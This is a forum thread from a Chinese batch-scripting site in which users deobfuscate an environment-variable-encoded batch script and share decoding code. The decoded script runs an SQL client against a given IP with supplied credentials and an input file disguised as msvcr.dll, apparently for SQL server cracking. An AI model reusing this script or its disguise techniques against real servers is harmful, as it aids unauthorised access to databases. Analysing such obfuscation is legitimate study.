标题: [其他] 变量加密批处理我来解密大家来看看我解密错误没? [打印本页]
作者: 929289045 时间: 2012-6-15 11:19 标题: 变量加密批处理我来解密大家来看看我解密错误没?
加密的样子- @shift
- @%comspec:~-1%%userprofile:~5,1%h%appdata:~-7,1% %appdata:~-7,1%%programfiles:~-5,1%%programfiles:~-5,1%
- %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% %comspec:~-13,1%%userprofile:~5,1%%appdata:~-7,1%%appdata:~-15,1%%userprofile:~6,1%=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
- %tcopu:~32,1%%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %appdata:~-7,1%%tcopu:~11,1%%tcopu:~11,1%
- %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% IP=%1
- %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% USER=%2
- %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% PASS=%3
- %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%appdata:~-7,1%%programfiles:~4,1% %userprofile:~5,1%
- T%programfiles:~-4,1%%comspec:~-13,1%%appdata:~-13,1%%comspec:~-1% %a% 正在修复中~~
- %appdata:~7,1%%appdata:~-7,1%%appdata:~15,1%%comspec:~-1% %userprofile:~5,1%%appdata:~-7,1%%userprofile:~14,1%: %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%comspec:~-16,1%=%comspec:~-9,1%%tcopu:~17,1% %appdata:~-13,1%%programfiles:~-4,1%%userprofile:~14,1%%comspec:~-1%%comspec:~-16,1%=%tcopu:~16,1%
- %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %IP% SQL
- %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL账号%USER%
- %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL密码%PASS%
- %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %os:~5,1%%os:~5,1%%os:~5,1%.%tcopu:~21,1%%tcopu:~23,1%%tcopu:~21,1%%tcopu:~23,1%%comspec:~-13,1%%comspec:~-13,1%.%userprofile:~5,1%%appdata:~-7,1%%appdata:~7,1%
- %comspec:~-16,1%%tcopu:~6,1%%appdata:~-13,1%.%comspec:~-1%%comspec:~-2,1%%comspec:~-1% -S %IP% -U %USER% -P %PASS% <%appdata:~7,1%%comspec:~-16,1%%tcopu:~8,1%%userprofile:~5,1%%programfiles:~4,1%.%appdata:~15,1%%appdata:~-13,1%%appdata:~-13,1% -%userprofile:~14,1% -%appdata:~-13,1% %tcopu:~14,1% -%comspec:~-13,1% %tcopu:~23,1% -%appdata:~-7,1% %appdata:~-7,1%%tcopu:~5,1%\%IP%.%comspec:~-13,1%%comspec:~-2,1%%comspec:~-13,1%
- %comspec:~-1%%comspec:~-2,1%%programfiles:~-4,1%%comspec:~-13,1%
我解密出来的- @shift
- @echo oFF
- set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
- @echo off
- set IP=%1
- set USER=%2
- set PASS=%3
- color c
- Title %a% 正在修复中~~
- mode con: cols=20 lines=5
- echo %IP% SQL
- echo SQL账号%USER%
- echo SQL密码%PASS%
- sql.exe -S %IP% -U %USER% -P %PASS% <msvcr.dll -n -l 4 -t 8 -o ok\%IP%.txt
- exit
但是我感觉不对 求高手解密出来看看
作者: 929289045 时间: 2012-6-15 11:29
怎么没人啊
作者: CrLf 时间: 2012-6-15 12:29
本帖最后由 CrLf 于 2012-6-15 22:34 编辑
吐槽一下,引用环境变量来进行变量加密时完全不考虑通用性的行为,只能单机娱乐,变量环境稍有不同,解密后的结果将不完整。
解密代码,抗干扰能力弱爆了:- @echo off&setlocal enabledelayedexpansion
- (for /f "delims="eol^= %%a in ('findstr /n . %1') do (
- set /p str=
- call set "str=!str!"
- echo !str:%%=%%%%!
- for /f "tokens=1*"eol^= %%b in ("!str!") do (
- if /i %%b==set set %%c
- )
- ))<%1
- pause
只能解密出框架,因为无法区分用于加密的变量与实际意图而引用的 %str% 变量,也无法预知实际运行时才会发生的变量变更
作者: forfiles 时间: 2012-6-15 18:10
你用的是这个代码解密的吗?
http://www.bathome.net/thread-7204-1-1.html
作者: CrLf 时间: 2012-6-15 18:43
用 cmd /c 代替 call 以避免空变量被处理为空...但仍无法预知程序运行时对变量的动态影响:- @echo off&setlocal enabledelayedexpansion
- (for /f "delims="eol^= %%a in ('findstr /n . %1') do (
- set str=
- set /p str=
- for /f "delims="eol^= %%b in ('echo ^"!str:"=""!"') do (
- setlocal disabledelayedexpansion
- echo:%%~b>$
- endlocal&set str=
- set /p str=<$
- )
- set "str=!str:""="!"
- echo:!str!
- for /f "tokens=1*" %%b in ("!str!") do (
- if /i %%b==set call set %%c
- )
- ))<%1
- del $>nul
- pause
作者: tz_being 时间: 2012-6-17 09:31
据试验,5楼的解密代码和另一个帖子netbenton的解密代码都不行,我用另外的方法解密出的内容与楼主是相同的,只是楼主少了一句“echo www.1818tt.com”
作者: forfiles 时间: 2012-6-17 21:41
回复 6# tz_being
解密代码贴出来看看吧
作者: 小秋秋 时间: 2012-10-25 14:14
我汗 这是抓鸡的吧
| 欢迎光临 批处理之家 (http://bathome.net./) |
Powered by Discuz! 7.2 |